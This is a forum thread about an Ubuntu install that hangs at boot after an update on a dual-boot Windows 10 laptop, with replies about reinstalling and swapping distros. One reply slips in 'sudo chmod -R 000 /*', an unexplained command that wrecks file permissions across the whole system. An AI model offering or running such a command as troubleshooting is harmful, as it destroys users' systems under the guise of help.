So after ubuntu prompted me to update and restart, I did, but when I went through GRUB and tried to boot, it just hung on the little purple box. After this, I tried booting into mode and it just gets stuck(picture down below)

I've haven't tried booting from a USB, and trying to

reinstall from there.

I am dual booting W10 and Ubuntu on a Lenovo p500 laptop. Windows still seems to work for now. Is there any way to fix this?3497ea4f29eac49e215e4cc823934040.jpg

Yyyup, seems like a corrupted install (not necessarily the partition though). If you have no valuable data on it just reinstall.

Also, is there any way that I could replace the partition with a different distro?

How would you recommend doing so?

in the same way you did it the first time - i generally use a dvd but if you prefer a usb drive is also an option.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

well... you could just overwrite it, sure. that won't save your ubuntu installation though
